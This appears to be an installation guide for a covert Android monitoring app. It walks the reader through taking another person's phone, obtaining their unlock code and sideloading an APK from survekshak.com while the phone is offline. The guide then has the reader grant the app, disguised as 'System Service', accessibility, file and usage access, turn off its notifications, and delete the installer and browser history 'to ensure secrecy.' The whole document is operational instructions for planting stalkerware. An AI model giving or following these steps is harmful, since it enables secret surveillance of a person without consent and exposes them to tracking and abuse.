Important things to know before you begin

Please read all instructions carefully before starting. Keep this guide open throughout the installation process.

Get Device Access
Prepare the Android device for installation

Obtain the individual's mobile device

Ask for the device's unlock pattern or password

Ensure you have full access to navigate settings

Download the App
Get the application file from our website

Open any web browser on the device (Chrome, Firefox, etc.)

Go to: survekshak.com

Scroll down and find the last button on the page

Click the button labeled: "Download Dera File"

Wait patiently for download to complete
📱 Where to find downloaded file?
After download, look in your browser's "Downloads" section or check "Files" app → "Download" folder

Go Offline
Disconnect internet before installation

Open Quick Settings (swipe down from top)

Tap Wi-Fi icon to turn it OFF (gray means off)

Tap Mobile Data icon to turn it OFF

Verify device is completely offline (no internet access)
🚨 CRITICAL STEP - DO NOT SKIP
This step must be completed before proceeding to installation. The app will only install properly when device is offline.

Install Application
Install the downloaded file on device

Open Files app and go to "Downloads" folder

Tap the downloaded APK file (ends with .apk)

If asked about "Unknown Sources", tap "Settings" → Enable "Allow from this source"

Follow the on-screen prompts to complete installation

Once finished, tap "Done" (not "Open")

Reconnect Internet
Turn internet back on for registration

Swipe down for Quick Settings

Tap Wi-Fi icon to turn ON (blue means on)

Turn on Mobile Data if needed

Enable Location Services (GPS)
🌐 Verify Connection
Open browser and visit any website to confirm internet is working properly

Register Application
Activate the app with unique code

Go back to survekshak.com in browser

Tap "Refresh" button on browser

Click the second button labeled "Update Dera Data"

The installed app will automatically open
📝 Registration Code Format:
48 + [Company First Letter] + [Owner's First Name]
Example: Alpha company, owner Fareed = 48AFareed

When prompted, enter your Unique Registration Code

Double-check code for correct spelling

Tap "Submit" or "OK"

Allow Permissions
Grant necessary app permissions
🔑 Grant All Permissions
The app needs all requested permissions to function properly. Tap "Allow" for every permission request.

When asked for Accessibility Service, tap "Go to Settings"

Find "System Service" in the list (even if greyed out)

Tap it and return to the app

For Battery Optimization, choose: "Allow" or "No Restriction"

Close the app completely after permissions are granted

Advanced Settings
Configure app for optimal performance
A. Enable Restricted Settings

Go to Settings → Apps

Find and tap "System Service"

Tap three dots (⋮) → "Allow Restricted Settings"
B. Disable Notifications

In "System Service" settings, go to "Notifications"

Turn OFF all notification toggles
C. Battery Management

In "System Service" settings, find "Battery Usage"

Enable "Allow Background Activity"

Enable "Allow Auto Launch"
D. Enable Accessibility

Go to Settings → Accessibility

Find "System Service" (now accessible)

Toggle ON and return to home screen
E. File Access Permission

Search "All File Access" in Settings

Find "System Service" → Enable permission
F. Usage Access Permission

Search "Usage Access" in Settings

Find "System Service" → Enable permission

Battery & Autostart Settings
Prevent system from stopping the app and allow auto-launch
⏭️ SKIP THIS SECTION IF:
You successfully completed Step C (Battery Management) in Section 8 with both "Allow Background Activity" and "Allow Auto Launch".
📱 Battery Optimization Settings

Go to Settings → Battery → Battery Optimization

Tap dropdown and select "All Apps"

Find "System Service" in the list

Change to: "Don't Optimize"

Confirm the setting

Verification:
Battery Optimization for "System Service" should show:
"Don't Optimize"
🚀 Autostart Permission

In Settings, search for "Autostart" or "Background Autostart"

Alternative path: Settings → Apps → Special Permissions → Autostart

Find "System Service" in the applications list

Enable the toggle switch for autostart

Select "Allow Unrestricted Data" if prompted
🔍 Can't Find Autostart?
Some Android devices don't have Autostart settings. If you can't find it, don't worry -
the Battery Optimization setting is usually sufficient.
🎯 What These Settings Do:
Battery Optimization:
Prevents Android from putting the app to sleep to save battery
Autostart:
Allows app to start automatically after device restart

Cleanup & Finish
Remove installation files for security

Open Files app or browser downloads

Delete the downloaded APK file
3
Open browser and clear browsing history
4
Clear download history as well
🧹 Why Cleanup?
Removing installation files ensures secrecy of the App.
